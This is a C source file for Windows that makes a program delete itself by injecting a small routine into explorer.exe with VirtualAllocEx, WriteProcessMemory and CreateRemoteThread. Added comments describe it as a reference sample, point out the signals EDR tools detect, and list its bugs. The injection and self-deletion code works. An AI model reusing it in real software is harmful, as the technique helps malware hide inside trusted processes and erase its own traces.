//Auto Delete
//coded by robinh00d
//
// Self-deleting executable: the program copies a small routine (func) and a
// parameter block (ARGVDATA) into EXPLORER.EXE, starts it there as a remote
// thread, and that thread deletes this executable's own image file once the
// original process has exited. This is the classic "self-delete by code
// injection" pattern; the API sequence used below — OpenProcess with
// PROCESS_ALL_ACCESS, VirtualAllocEx with PAGE_EXECUTE_READWRITE,
// WriteProcessMemory, CreateRemoteThread — is exactly what process-injection
// telemetry (ETW / EDR) alerts on, the cross-process RWX allocation being the
// strongest single signal. Kept here as a reference for what such a sample
// looks like at source level, not as something to reuse.
//
// Build notes (32-bit, MSVC): function addresses are carried in DWORD fields,
// so this only fits a 32-bit build; the #pragma comment(lib, ...) lines are
// MSVC-specific.
// NOTE(review): the header names were lost when this page was extracted;
// presumably <windows.h> and <tlhelp32.h> (PROCESSENTRY32, Process32First,
// CreateToolhelp32Snapshot) — confirm against the original file.
#include
#include
#pragma comment(lib,"kernel32.lib")
#pragma comment(lib,"user32.lib")

// Parameter block copied verbatim into the target process and passed to func
// as its thread argument. It carries the kernel32 export addresses func needs
// (so the copied routine makes no import or absolute-address references of
// its own), the path of the file to delete, and the PID to wait for.
// Assumes kernel32.dll is mapped at the same base in the target process as
// in this one, otherwise the stored addresses are meaningless there.
typedef struct sARGVDATA {
    DWORD OpenProcessAddr ;            // address of kernel32!OpenProcess
    DWORD WaitForSingleObjectAddr ;    // address of kernel32!WaitForSingleObject
    DWORD DeleteFileAddr ;             // address of kernel32!DeleteFileA
    char File[MAX_PATH] ;              // full path of the file to delete (this executable)
    DWORD pid ;                        // PID of the process to wait for before deleting
} ARGVDATA ;

// Thread routine executed inside the target process. Its compiled bytes are
// copied into the target with WriteProcessMemory (see WinMain), so it must be
// self-contained: every external call goes through the function pointers in
// *pArgv, and it uses no string literals, globals or helper calls. That the
// compiler actually emits relocation-free code for it cannot be verified from
// the source alone.
// Waits for pArgv->pid to exit (if it can be opened), then deletes
// pArgv->File. Note that both branches delete the file; the only difference
// is whether the routine waits first. Always returns 0.
DWORD WINAPI func(ARGVDATA *pArgv) {
    typedef HANDLE (__stdcall *MyOpenProcess)(DWORD,BOOL,DWORD) ;
    typedef DWORD (__stdcall *MyWaitForSingleObject)(HANDLE,DWORD) ;
    typedef BOOL (__stdcall *MyDeleteFile)(LPCSTR) ;
    HANDLE hProc ;
    MyOpenProcess pOpenProcess ;
    MyWaitForSingleObject pWaitForSingleObject ;
    MyDeleteFile pDeleteFile ;
    // Resolve the three kernel32 calls from the addresses handed over in the
    // parameter block rather than through this module's import table.
    pOpenProcess = (MyOpenProcess)pArgv->OpenProcessAddr ;
    pWaitForSingleObject = (MyWaitForSingleObject)pArgv->WaitForSingleObjectAddr ;
    pDeleteFile = (MyDeleteFile)pArgv->DeleteFileAddr ;
    hProc = pOpenProcess(PROCESS_ALL_ACCESS,FALSE,pArgv->pid) ;
    if (hProc!=NULL) {
        // Block until the originating process has exited so its image file
        // is no longer mapped, then remove it. hProc itself is never closed.
        pWaitForSingleObject(hProc,INFINITE) ;
        pDeleteFile(pArgv->File) ;
    } else {
        //Delete File
        // The process could not be opened (already gone or access denied);
        // the deletion is attempted anyway, with no return value check.
        pDeleteFile(pArgv->File) ;
    }
    return 0 ;
}

// Entry point: resolves the kernel32 addresses, fills ARGVDATA with this
// process's PID and image path, locates EXPLORER.EXE via a Toolhelp snapshot,
// plants ARGVDATA and a 2 KB copy of func into it, starts the copy as a remote
// thread and then exits. All failures are reported with a MessageBox and -1.
// Robustness notes, all visible in the code below:
// - ps is declared uninitialized; if the enumeration ends without a match,
//   ps.th32ProcessID holds whatever the last Process32First/Next call left
//   there (or indeterminate memory if the first call failed), and that value
//   is passed to OpenProcess regardless.
// - hSnap is never closed, hKernel is not released on the error paths, and
//   neither remote allocation is ever freed.
// - WriteProcessMemory copies a fixed 1024*2 bytes starting at &func, so the
//   copy includes whatever follows func in the code section and also assumes
//   func is no larger than that.
// - The thread handle returned by CreateRemoteThread is discarded; the
//   subsequent WaitForSingleObject is given p_remote_thread, which is the
//   remote allocation address rather than a handle.
// - Only an exact, case-sensitive match on "EXPLORER.EXE" is accepted.
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    ARGVDATA argc_data ;
    ARGVDATA *p_data ;
    HANDLE hSnap ;
    HANDLE hExp ;
    HANDLE hKernel ;
    FARPROC p_remote_thread ;
    PROCESSENTRY32 ps ;
    BOOL bRet ;
    // LoadLibrary return value is not checked before it is passed to
    // GetProcAddress (kernel32 is already loaded in every process, so this
    // only bumps its reference count).
    hKernel = LoadLibrary("kernel32.dll") ;
    //Fill up the parameter
    // Addresses are truncated to DWORD, hence the 32-bit-only restriction noted
    // at the top of the file. None of the GetProcAddress results are checked.
    argc_data.OpenProcessAddr = (DWORD)GetProcAddress(hKernel,"OpenProcess") ;
    argc_data.WaitForSingleObjectAddr = (DWORD)GetProcAddress(hKernel,"WaitForSingleObject") ;
    argc_data.DeleteFileAddr = (DWORD)GetProcAddress(hKernel,"DeleteFileA") ;
    argc_data.pid = GetCurrentProcessId() ;
    // Own image path is the file that will be deleted; truncation to MAX_PATH
    // and the return value are not checked.
    GetModuleFileName(NULL,argc_data.File,MAX_PATH) ;
    // Walk the process list looking for the explorer process to inject into.
    // The snapshot handle is never closed.
    hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0) ;
    bRet = Process32First(hSnap,&ps) ;
    while (bRet) {
        if (!strcmp(ps.szExeFile,"EXPLORER.EXE")) {
            break ;
        }
        bRet = Process32Next(hSnap,&ps) ;
    }
    // Opened with full access so memory can be allocated and written and a
    // thread created in it; this OpenProcess is the first detectable step of
    // the injection sequence. ps.th32ProcessID is used even if no match was
    // found above.
    hExp = OpenProcess(PROCESS_ALL_ACCESS,FALSE,ps.th32ProcessID) ;
    if (NULL==hExp) {
        MessageBox(0,"Fail to open Explorer","DEBUG",0) ;
        return -1 ;
    }
    // Remote copy of the parameter block (read/write only).
    p_data = (ARGVDATA *)VirtualAllocEx(hExp, NULL, sizeof(ARGVDATA), MEM_COMMIT, PAGE_READWRITE) ;
    if (NULL==p_data) {
        MessageBox(0,"Fail to assign memory!","DEBUG",0) ;
        CloseHandle(hExp) ;
        return -1 ;
    }
    if (FALSE==WriteProcessMemory(hExp,p_data,&argc_data,sizeof(ARGVDATA),NULL)) {
        MessageBox(0,"Fail to Fill up the parameter in memory!","DEBUG",0) ;
        CloseHandle(hExp) ;
        return -1 ;
    }
    // Remote copy of func: a 2 KB writable+executable region. A cross-process
    // PAGE_EXECUTE_READWRITE allocation is the hallmark memory-scanner and
    // EDR indicator for this technique.
    p_remote_thread = (FARPROC)VirtualAllocEx(hExp,NULL,1024*2,MEM_COMMIT,PAGE_EXECUTE_READWRITE) ;
    if (NULL==p_remote_thread) {
        MessageBox(0,"Fail!","DEBUG",0) ;
        CloseHandle(hExp) ;
        return -1 ;
    }
    // Copies a fixed 1024*2 bytes from &func, not the function's actual size.
    if (FALSE==WriteProcessMemory(hExp,p_remote_thread,(FARPROC)&func,1024*2,NULL)) {
        MessageBox(0,"Fail!","DEBUG",0) ;
        CloseHandle(hExp) ;
        return -1 ;
    }
    // Start the planted routine in the target with p_data as its argument.
    // Return value (the thread handle) is discarded and not checked.
    CreateRemoteThread(hExp,NULL,0,(LPTHREAD_START_ROUTINE)p_remote_thread,p_data,0,NULL) ;
    // Waits on the remote allocation address, not on a thread handle.
    WaitForSingleObject(p_remote_thread,INFINITE) ;
    FreeLibrary(hKernel) ;
    CloseHandle(hExp) ;
    MessageBox(NULL,"Demo","ADH-CN",0) ;
    //Sleep(3000) ;
    // Process exit is what the remote thread waits for before deleting the file.
    ExitProcess(0) ;
}